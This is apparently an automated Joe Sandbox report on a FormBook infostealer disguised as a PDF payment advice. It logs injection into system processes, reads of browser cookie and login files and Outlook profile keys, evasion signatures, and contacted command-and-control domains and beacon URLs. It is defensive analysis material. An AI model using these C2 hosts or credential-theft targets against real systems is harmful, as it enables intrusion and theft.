                Source: rPaymentAdviceNote_pdf.exe, lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086862B cpuid 0_2_0086862B
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00874E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00874E87
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00881E06 GetUserNameW,0_2_00881E06
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00873F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00873F3A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008449A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_81
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_XP
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_XPe
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_VISTA
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_7
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: WIN_8
                Source: rPaymentAdviceNote_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_008B6283
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_008B6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569491 Sample: rPaymentAdviceNote_pdf.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 28 www.aziziyeescortg.xyz 2->28 30 tempatmudisini06.click 2->30 32 12 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 rPaymentAdviceNote_pdf.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 lDBisuvfBkK.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasautou.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 lDBisuvfBkK.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 tempatmudisini06.click 103.21.221.4, 49988, 49989, 49990 LINKNET-ID-APLinknetASNID unknown 22->34 36 www.aziziyeescortg.xyz 104.21.77.71, 49753, 80 CLOUDFLARENETUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rPaymentAdviceNote_pdf.exe34%ReversingLabsWin32.Trojan.AutoitInject
                rPaymentAdviceNote_pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/0kli/0%Avira URL Cloudsafe
                http://www.sankan-fukushi.info/21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.questmatch.pro/ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.conansog.shop/m7wz/0%Avira URL Cloudsafe
                http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
                https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW0%Avira URL Cloudsafe
                https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
                http://www.questmatch.pro/ipd6/0%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz/wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP0%Avira URL Cloudsafe
                https://pepabo.com/0%Avira URL Cloudsafe
                http://www.beythome.online/80gy/0%Avira URL Cloudsafe
                http://www.beythome.online/80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.conansog.shop/m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.sankan-fukushi.info/21k5/0%Avira URL Cloudsafe
                http://www.callyur.shop0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/5rfk/0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP0%Avira URL Cloudsafe
                http://www.callyur.shop/hayl/0%Avira URL Cloudsafe
                https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ssl.goentri.com
                		13.248.221.243
                		truetrue
                  		unknown
                  www.aziziyeescortg.xyz
                  		104.21.77.71
                  		truetrue
                    		unknown
                    www.questmatch.pro
                    		104.21.62.184
                    		truefalse
                      		high
                      www.conansog.shop
                      		104.21.41.74
                      		truefalse
                        		high
                        tempatmudisini06.click
                        		103.21.221.4
                        		truetrue
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		high
                            www.sankan-fukushi.info
                            		163.44.185.183
                            		truefalse
                              		high
                              callyur.shop
                              		66.29.137.10
                              		truetrue
                                		unknown
                                www.callyur.shop
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.beythome.online
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.grandesofertas.fun
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.tempatmudisini06.click
                                      		unknown
                                      		unknownfalse
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.tempatmudisini06.click/0kli/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sankan-fukushi.info/21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.aziziyeescortg.xyz/wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.conansog.shop/m7wz/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.questmatch.pro/ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.questmatch.pro/ipd6/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tempatmudisini06.click/0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.conansog.shop/m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.beythome.online/80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.beythome.online/80gy/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sankan-fukushi.info/21k5/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.grandesofertas.fun/5rfk/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.callyur.shop/hayl/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPPtrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabrasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.lolipop.jp/hc/ja/articles/360049132953rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhWrasautou.exe, 0000000B.00000002.3095003763.00000000054C6000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003176000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gifrasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://lolipop.jp/rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://pepabo.com/rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.callyur.shoplDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://js.ad-stir.com/js/adstir.js?20130527rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://static.minne.com/files/banner/minne_600x500rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            103.21.221.4
                                                            		tempatmudisini06.clickunknown
                                                            		9905LINKNET-ID-APLinknetASNIDtrue
                                                            163.44.185.183
                                                            		www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPfalse
                                                            104.21.77.71
                                                            		www.aziziyeescortg.xyzUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            104.21.62.184
                                                            		www.questmatch.proUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            85.159.66.93
                                                            		natroredirect.natrocdn.comTurkey
                                                            		34619CIZGITRfalse
                                                            13.248.221.243
                                                            		ssl.goentri.comUnited States
                                                            		16509AMAZON-02UStrue
                                                            104.21.41.74
                                                            		www.conansog.shopUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            66.29.137.10
                                                            		callyur.shopUnited States
                                                            		19538ADVANTAGECOMUStrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1569491
                                                            Start date and time:2024-12-05 19:38:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
                                                            Number of analysed new started processes analysed:18
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:rPaymentAdviceNote_pdf.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@10/8
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 49
                                                            • Number of non-executed functions: 277
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target lDBisuvfBkK.exe, PID 7000 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: rPaymentAdviceNote_pdf.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            No simulations

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            103.21.221.4file.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini06.click/4iun/
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini06.click/0kli/
                                                            FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini06.click/kfzf/
                                                            Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/abla/
                                                            -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/iydt/
                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tempatmudisini01.click/iydt/
